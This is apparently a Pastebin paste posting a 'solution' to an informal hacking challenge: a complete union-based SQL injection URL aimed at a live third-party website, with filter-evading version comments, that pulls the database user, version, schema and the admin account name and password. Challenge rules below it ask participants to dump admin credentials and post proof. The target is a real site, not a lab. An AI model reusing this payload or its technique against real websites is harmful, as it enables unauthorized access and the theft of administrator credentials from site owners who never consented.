Advertisement
bilasi

‎Atze Amnezia‎' solution

Jun 11th, 2016
580
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PL/SQL 0.78 KB | None | 0 0
  1. Solution:
  2. ==========
  3. http://www.cinga.cn/en/duihan.php?id=-23' /*!50000Union*/ /*!50000Select*/ 1,2,/*!50000concat*/(0x44697075,0x3c62723e,'USER ::  ',user(),0x3c62723e,'version :: ', version(),0x3c62723e, 'database :: ',schema(),     0x3c62723e, 'admin: ',( /*!50000select*/ /*!50000concat*/(admin_account) from admin),0x3c62723e, 'password : ',( /*!50000select*/ /*!50000concat*/(admin_password) from admin)         ),4,5,6,7,8,9 -- -
  4.  
  5.  
  6. Target
  7. ===========
  8. http://www.cinga.cn/en/duihan.php?id=23
  9. Rules & Tasks
  10. ===========
  11. ! Union Based Injection Only !
  12. ! Use Only 1 column !
  13. ! Don't change parameter !
  14. ! Print YOUR Name,version,USER AND database !
  15. ! Print Admin Details(Name && Pw[poste NOT the full hash !!!]) !
  16. ! Post Your Proof here && Pm me syntax !
  17. ! DO NOT HARM THE SITE !
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement